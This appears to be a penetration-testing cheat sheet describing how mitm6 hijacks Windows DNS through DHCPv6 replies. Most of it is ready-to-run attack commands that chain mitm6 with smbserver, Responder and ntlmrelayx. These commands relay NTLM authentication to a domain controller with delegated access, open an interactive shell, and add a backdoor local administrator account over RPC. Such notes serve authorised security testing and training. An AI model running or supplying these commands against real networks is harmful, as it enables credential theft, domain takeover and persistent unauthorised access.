# Resources

# mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server.
# It does this by replying to DHCPv6 messages, providing victims with a link-local
# IPv6 address and setting the attackers host as default DNS server

# When using mitm6, it issues a DHCPv6 lease to clients that last for a period of 300 seconds (or 5 minutes)
# Due to this, it's possible that several DNS queries will actually fail, resulting in clients
# not being able to access services that rely on DNS names.
# You can, however, change this in the source code.

# Gonna create a fake DNS server for targets
$ sudo mitm6 -d lab.local

Using with SMB server

# First shell
$ sudo mitm6 -i eth0

# Second shell
$ smbserver.py SHARE_NAME path/to/share

Using with Responder

# First shell
$ sudo mitm6 -i eth0

# Second shell
$ responder -I eth0 -wFv

Using with ntlmrelayx

# First attacking shell
$ sudo mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
# Second attacking shell
$ ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

# wh == server hosting WPAD (attacking IP)
# t == target for relay
# i == open interactive shell
$ ntlmrelayx.py -wh -t smb:// -i

# Or
$ ntlmrelayx.py -ip -t rpc://example.local -c "net user xuser xpass /add && net localgroup Administrators xuser /add"